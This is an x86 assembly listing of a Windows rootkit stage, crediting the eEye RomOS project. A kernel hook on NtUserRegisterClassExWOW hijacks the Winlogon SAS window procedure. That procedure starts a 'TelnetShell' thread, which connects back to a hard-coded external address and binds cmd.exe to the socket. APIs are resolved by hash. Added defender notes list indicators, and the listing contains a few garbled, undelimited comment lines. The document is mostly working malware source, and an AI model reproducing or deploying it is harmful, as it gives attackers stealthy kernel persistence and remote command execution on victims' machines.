;*****************************************************************************************************************************************MyNtUserRegisterClassExWOW: ;win32k!NtUserRegisterClassExWOW HOOK .
; Kernel-side hook body that runs in place of win32k!NtUserRegisterClassExWOW.
; It reads the class being registered and, when the class name hashes to
; 72ABEC2Dh (the author's hash of L"SAS window class"), swaps
; WNDCLASSEXW.lpfnWndProc for MySASWndProc and stashes the original procedure
; address at PEB+0EB0h. Control then falls through to NTURCEWOW_Done, which
; unwinds and transfers to the original routine.
; Stack after the two pushes below (offsets relative to esp):
;   [esp]        previous fs:[0] handler
;   [esp+4]      our handler (MyNtUserRegisterClassExWOW_SEH)
;   [esp+8]      pushad frame (32 bytes)
;   [esp+8+20h]  return address
;   [esp+8+24h]  arg1 -> WNDCLASSEXW
;   [esp+8+28h]  arg2 -> UNICODE_STRING class name
; Register roles: ebp = MmHighestUserAddress (author's annotation), edx/esi =
; user pointers being read, ecx = hash loop counter and later the PEB pointer.
; Expressions of the form CSL_KERNEL_DEST + (X - Code32Start) relocate a label
; into the copy of this blob placed at CSL_KERNEL_DEST; those symbols are
; defined outside this listing.
; Defender notes: the user-pointer reads are guarded only by an unsigned compare
; against MmHighestUserAddress plus the SEH frame (which the author's own
; comment says is unreliable), so a bad pointer can fault the kernel; the hash
; constant, the PEB+0EB0h stash and the SharedUserData read at 7FFE02B4h are
; fixed artifacts of this stage.
pushad ;bochs debug session #10: lb 0xffdf091e (address obtained in session #9).
;bochs commands used: x esp, u /50 eip.
xor eax,eax
push (CSL_KERNEL_DEST + (MyNtUserRegisterClassExWOW_SEH - Code32Start))
push dword ptr fs:[eax] ;build an EXCEPTION_REGISTRATION record on the stack (fs:[0] = previous handler)
mov dword ptr fs:[eax],esp ;install our handler. #### Debugging showed the installed handler sometimes does not fire. ####
;Check via the incoming arguments whether the class name is L"SAS window class"; if so replace its 'lpfnWndProc'. See "Win32 application window message principles".
mov ebp,ds:[7FFE02B4h] ;EBP = MmHighestUserAddress (author's annotation; 7FFE0000h is the SharedUserData page)
mov edx,[esp + 8 + 28h] ;edx -> class name, as PUNICODE_STRING.
.if edx <= ebp ;unsigned compare: reject kernel-range pointers
.if word ptr [edx] == 16*2 ;UNICODE_STRING.Length in bytes: 16 WCHARs = L"SAS window class" without terminator
mov esi,[edx + 4] ;esi = UNICODE_STRING.Buffer
.if esi <= ebp
mov ecx,16 ;16 WCHARs to hash
mov edx,72ABEC2Dh ;seed chosen so that hashing L"SAS window class" ends at 0
@@:
lodsw ;ax = next WCHAR; eax upper bits stay 0 (zeroed above)
sub edx,eax
ror edx,7
loop @B
.if edx == 0 ;name matched: replace the window procedure, saving the old one in the PEB
mov esi,[esp + 8 +24h];esi -> caller's WNDCLASSEXW.
.if esi <= ebp
mov ecx,fs:[edx + 18h] ;edx is 0 here, so this is fs:[18h]: ecx -> TEB
mov ecx,[ecx +30h] ;ecx -> PEB (TEB.ProcessEnvironmentBlock)
.if ecx <= ebp ;bochs debug session #11: lb 0xffdf0971
mov eax,(CSL_USER_BACKDOOR + (MySASWndProc - Code32Start)) ;user-mode address of our replacement procedure
xchg dword ptr [esi + 8],eax ;WNDCLASSEXW.lpfnWndProc (offset 8) <- ours; eax = original procedure
; NOTE(review): the trailing text on the next line is not delimited as a comment in this transcription; the store itself saves the original lpfnWndProc at PEB+0EB0h.
mov [ecx + 0eb0h],eax EB->0EB0h = 旧的'lpfnWndProc' (保存旧的SASWndProc)
.endif
.endif
.endif
.endif
.endif
.endif
;*****************************************************************************************************************************************NTURCEWOW_Done: ;bochs debug session #11: lb 0xffdf097f
; Common exit: unlink the SEH frame, restore registers and transfer to the
; original NtUserRegisterClassExWOW through a push/ret trampoline.
xor eax,eax
pop dword ptr fs:[eax] ;restore the previous fs:[0]
pop ecx ;discard our handler address
popad
pushd 0 ;placeholder immediate; presumably patched with the original routine's address by the installer (outside this listing)
NTURCEWOW_ORIGINAL EQU $-4 ;address of that 4-byte immediate (the patch site)
ret ;jump to whatever address was pushed, i.e. the original NtUserRegisterClassExWOW.
;*****************************************************************************************************************************************MyNtUserRegisterClassExWOW_SEH: ;Note: on installing exception handlers see "Win32 Application Programming".
; SEH handler for the hook above. On a fault while the hook reads user memory
; it rewrites CONTEXT.Eip to NTURCEWOW_Done so the hook unwinds and the
; original routine still runs. Standard handler frame: [esp+0Ch] is the
; CONTEXT pointer (third argument). Returns eax = 0 (ExceptionContinueExecution)
; so execution resumes at the patched Eip. Clobbers eax, edx.
xor eax,eax ;eax = 0 = ExceptionContinueExecution. lb 0xffdf098c (debugging the exception path: compatibility not very stable).
cdq ;CDQ sign-extends eax into edx; with eax = 0 it is a one-byte way to zero edx.
mov dl,0B8h ;edx = 0B8h = offset of Eip within the x86 CONTEXT
add edx,[esp + 0Ch] ;[esp+0Ch] -> CONTEXT record passed to the handler.
;Context->Eip
mov dword ptr [edx],(CSL_KERNEL_DEST + (NTURCEWOW_Done - Code32Start)) ;resume at NTURCEWOW_Done in the kernel copy of the blob
ret
;*****************************************************************************************************************************************MySASWndProc: ;bochs debug session #12: the program is now running in user mode.
;lb 0x7ffe099c
; Replacement window procedure installed by the kernel hook. On WM_CREATE it
; locates kernel32 by walking the PEB loader list, resolves CreateThread by
; hash and starts TelnetShell on a new thread. Every message is then forwarded
; to the original procedure, whose address the hook stashed at PEB+0EB0h.
; Stack at entry: [esp] = return address, [esp+4] = hWnd, [esp+8] = uMsg, ...;
; after 'push eax' + pushad, uMsg is at [esp+2Ch] and the pushed eax slot at
; [esp+20h].
; Forwarding trick: the pushed eax slot is overwritten with the original
; procedure address, so 'popad' followed by 'ret' lands in the original
; procedure with the caller's arguments untouched.
; Defender notes: a thread created from inside a window procedure whose start
; address lies outside any loaded image (the breakpoint addresses in the
; comments suggest the blob sits at 0x7ffe0xxx - confirm) is the user-mode
; artifact of this stage.
push eax ;reserve a slot; later overwritten with the original SASWndProc address. Exit path: popad / ret.
pushad
xor eax,eax
mov edx,fs:[eax+30h] ;edx -> PEB (TEB+30h)
mov eax,[edx+0EB0h] ;original SASWndProc address, stashed by the kernel hook
mov [esp+20h],eax ;overwrite the 'push eax' slot so the final ret transfers to the original proc
mov eax,[esp+2Ch] ;get 'uMsg' argument
.if eax == 0001h ;WM_CREATE
mov eax,[edx+0Ch] ;PEB.Ldr -> PEB_LDR_DATA
mov ecx,[eax+1Ch] ;first entry of InInitializationOrderModuleList
.repeat
mov ebx,[ecx+8] ;DllBase (offset relative to the InInitializationOrder links)
mov esi,[ecx+20h] ;BaseDllName.Buffer (UTF-16)
mov ecx,[ecx] ;Flink -> next module
lodsb ;low byte of the first WCHAR of the name
or al,20h ;fold to lower case
.until al == 'k' ;assume KERNEL32.DLL is the first module whose name starts with 'K' (loader-order assumption; not guaranteed on every Windows version)
;EBX = KERNEL32 image base. bochs debug session #13: lb 0x7ffe09cc
;mov edi,(CSL_USER_BACKDOOR + (PEApiHashFind - Code32Start))
push ebx ;stack slot used as the dwThreadID out-parameter (ebx's value is only filler).
push esp ;push addr dwThreadID
push 0 ;dwCreationFlags
push 0 ;lpParameter
push (CSL_USER_BACKDOOR + (TelnetShell - Code32Start)) ;lpStartAddress = TelnetShell in the user-mode copy of the blob
push 0 ;dwStackSize
push 0 ;lpThreadAttributes
mov edx,3f1764e5h ;hash("CreateThread")=3f1764e5h
call PEApiHashFind ;author's open question: should this be 'call edi' instead (see the commented-out 'mov edi' above)?
call eax ;invoke CreateThread,NULL,0,offset TelnetShell,NULL,NULL,addr dwThreadID
pop ebx ;discard the dwThreadID slot.
.endif
popad
ret ;invoke original SASWndProc
;*****************************************************************************************************************************************TelnetShell: ;Reverse-connect "telnet" backdoor thread; the author states it targets win2k/xp/2003.
; Thread procedure started by MySASWndProc. Loops forever: loads WS2_32, calls
; WSAStartup, creates a TCP socket and connects to the hard-coded endpoint
; (see the notes at the connect call); on failure it sleeps 60 s and retries,
; on success it launches "cmd" with stdin/stdout/stderr bound to the socket,
; waits for it to exit, then loops. Never returns. Every API is resolved by
; hash through PEApiHashFind (ebx = module base, edx = hash, eax = result).
; Register roles: edi = kernel32 base for the whole loop; ebx = base of the
; module the next lookup targets; esi = socket; ebp = stack mark restored with
; 'mov esp,ebp' at the end of each iteration (all locals live on the stack).
; Defender notes: endpoint, port, retry interval and the "WS2_32"/"cmd"
; constants are fixed in the code. Each iteration calls WSAStartup again and
; never closes the previous socket, so handles accumulate while it runs. A
; cmd process whose standard handles are a socket, and a thread started from a
; non-image address, are the host-side indicators.
xor eax,eax ;bochs debug session #14: lb 0x7ffe09f0
mov edx,fs:[eax+30h] ;ptr to PEB
mov eax,[edx+0Ch] ;ptr to loader data
mov ecx,[eax+1Ch] ;ptr to first module in initialization-order list
.repeat
mov ebx,[ecx+8] ;module image base
mov esi,[ecx+20h] ;ptr to module file name
mov ecx,[ecx] ;ptr to next module
lodsb
or al,20h
.until al == 'k' ;assume KERNEL32.DLL will be first module starting with 'K'
;EBX = KERNEL32 image base
mov edi,ebx ;edi = kernel32 base. bochs debug session #15: lb 0x7ffe0a05
TelnetShell_Strat:
mov ebp,esp ;mark the stack; restored at the end of each iteration. bochs debug session #15: lb 0x7ffe0a07
push 00003233h
push 5f325357h ;esp->"WS2_32" (the two pushes spell "WS2_32\0\0")
push esp
mov edx,2e864192h ;Hash("LoadLibraryA")=2e864192h
call PEApiHashFind
call eax ;LoadLibraryA(&WS2_32DLL); returns EAX = base of the loaded DLL.
mov ebx,eax ;ebx = WS2_32 base (subsequent lookups target WS2_32)
sub esp,1ech ;reserve 1ECh bytes for WSADATA (more than the 32-bit struct needs)
push esp ;esp->WSADATA struct
push 202h ;wVersionRequested = 2.2 (the older comment below saying 0x101 is stale)
mov edx,0c05a351eh ;Hash("WSAStartup")=0c05a351eh
call PEApiHashFind
call eax ;WSAStartup(0x101, &WSADATA)
push 0 ;dwFlags
push 0 ;g
push 0 ;lpProtocolInfo
push 6 ;IPPROTO_TCP=6 IPPROTO_UDP=17
push 1 ;SOCK_STREAM=1 SOCK_DGRAM=2
push 2 ;AF_INET=2
mov edx,0ef3c1916h ;Hash("WSASocketA")=0ef3c1916h
call PEApiHashFind
call eax ;s=WSASocketA(2,1,6,0,0,0)
mov esi,eax ;esi=socket s
; NOTE(review): the immediate on the next line does NOT encode 192.168.100.111 (that would be 06f64a8c0h, as the comment itself says); its bytes da 59 53 26 decode to 218.89.83.38 - treat the immediate, not the comment, as the indicator (verify).
push 0265359dah ;sockaddr_in.sin_addr;192.168.100.111(06f64a8c0h)
push 0feff0002h ;0x02=AF_INET(sin_family);0xfffe=65534(sin_port, network byte order)
;.repeat
mov edx,esp ;edx -> sockaddr_in just built on the stack
push 10h ;sizeof(sockaddr_in)
push edx ;esp->sockaddr_in struct
push esi ;socket s
mov edx,5ddd8b01h ;Hash("connect")=5ddd8b01h
;mov ebx,edi ;ebx = kernel32 base
call PEApiHashFind
call eax ;IPPROTO_TCP c=connect(s, &address, sizeof(address))
;.until eax == 0 ;connection succeeded
mov ebx,edi ;ebx = kernel32 base (remaining lookups target kernel32)
.if eax != 0 ;connect failed (SOCKET_ERROR): wait and retry
push 60000 ;dwMilliseconds = 60 s
mov edx,0cb9765ah ;Hash("Sleep")=0cb9765ah
call PEApiHashFind
call eax ;invoke Sleep,60000
mov esp,ebp ;drop everything pushed this iteration (the socket is left open)
mov ebx,edi ;ebx = kernel32 base
jmp TelnetShell_Strat ;for another connection
;ret
.endif
push 646d63h ;"cmd" + NUL (the comment says cmd.exe; the bytes are 'c','m','d',0)
mov edx,esp ;edx->file name
push esi ;STARTUPINFOA.hStdError
push esi ;STARTUPINFOA.hStdOutput
push esi ;STARTUPINFOA.hStdInput
push 0 ;STARTUPINFOA.lpReserved2
push 0 ;wShowWindow cbReserved2
push 101h ;STARTUPINFO.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES
mov ecx,0fh ;15 zero dwords: 11 for cb..dwFillAttribute plus 4 for PROCESS_INFORMATION below it
@@:
push 0 ;STARTUPINFOA.cb ~ STARTUPINFOA.dwFillAttribute
loop @B
lea ecx,[esp+10h] ;ecx->STARTUPINFOA.cb (skips the 16-byte PROCESS_INFORMATION at [esp])
mov dword ptr [ecx],44h ;STARTUPINFOA.CB=44h(len STARTUPINFOA)
push esp ;esp->PROCESS_INFORMATION STRUCT(all 0)
push ecx ;ecx->STARTUPINFOA STRUCT
push 0 ;lpCurrentDirectory
push 0 ;lpEnvironment
push 0 ;dwCreationFlags
push 1 ;bInheritHandles = TRUE (so the socket handles reach the child)
push 0 ;lpThreadAttributes
push 0 ;lpProcessAttributes
push edx ;lpCommandLine -> "cmd"
push 0 ;lpApplicationName
mov edx,4b5d35e6h ;Hash("CreateProcessA")=4b5d35e6h
call PEApiHashFind
call eax ;CreateProcessA(0, Addr"cmd.exe",0,0,1,0,0,0,si, pi)
; NOTE(review): the trailing text on the next line is not delimited as a comment in this transcription; the pop reads PROCESS_INFORMATION.hProcess, which sits at [esp] after the stdcall callee cleans its arguments.
pop ecx ROCESS_INFORMATION.hProcess
push -1 ;dwMilliseconds = INFINITE
push ecx ;hProcess
mov edx,8885abf2h ;Hash("WaitForSingleObject")=8885abf2h
call PEApiHashFind
call eax ;WaitForSingleObject(Handle, time)
mov esp,ebp ;drop this iteration's locals
mov ebx,edi ;ebx = kernel32 base
jmp TelnetShell_Strat ;for another connection
;ret
;*****************************************************************************************************************************************PEApiHashFind: ;In: EBX = image base, EDX = 32-bit hash. Out: eax = API address, 0 = not found.
; Resolves an export by name hash. Walks IMAGE_EXPORT_DIRECTORY.AddressOfNames
; from the last name down to the first, hashing each NUL-terminated name with
; "edx -= byte; ror edx,7" (the terminator byte is folded in too); a name
; matches when the running value reaches 0 starting from the caller's edx.
; On a match the ordinal table and function table give base + RVA, which is
; written into the pushad frame's saved eax so popad returns it in eax.
; Preserves all registers except eax and flags.
; Caveats visible in the code: forwarded exports are not recognised (the RVA is
; returned as if it pointed at code); a match at name index 0 is reported as
; not found because the post-loop check is '.if ecx > 0'.
xor eax,eax ;default result 0 (not found); also keeps eax's upper bytes clear for lodsb below
pushad
mov ecx,[ebx+3Ch] ;ecx = RVA of PE header
mov ebp,[ebx+ecx+78h] ;ebp = RVA of export directory
add ebp,ebx ;ebp -> ptr to export directory
mov ecx,[ebp+18h] ;ecx = IMAGE_EXPORT_DIRECTORY::NumberOfNames
mov edi,[ebp+20h] ;edi -> IMAGE_EXPORT_DIRECTORY::AddressOfNames
add edi,ebx
.while ecx > 0
dec ecx ;ecx = index of the name being tested (walks downward)
mov esi,[edi+ecx*4]
add esi,ebx ;esi -> the exported name string in memory.
push edx ;keep the caller's hash; the loop below consumes edx
.repeat
lodsb ;eax = next byte (upper bytes are 0)
sub edx,eax
ror edx,7
.until eax == 0 ;end of string
.if edx == 0 ;hash consumed exactly: this is the name
pop edx
.break ;leave with ecx = matching name index
.endif
pop edx ;restore the caller's hash for the next name
.endw
.if ecx > 0 ;found (index 0 is indistinguishable from "not found" here)
mov edx,[ebp+024h]
add edx,ebx ;AddressOfNameOrdinals
mov cx,[edx+ecx*2] ;cx = ordinal for this name index
mov eax,[ebp+01ch]
add eax,ebx ;AddressOfFunctions
add ebx,[eax+ecx*4] ;ebx = base + function RVA
mov [esp+1Ch], ebx ;overwrite saved EAX in the pushad frame with ptr to export
.endif
popad
ret
;*****************************************************************************************************************************************Code32End: ;感谢: eEye RootKit RomOS开源项目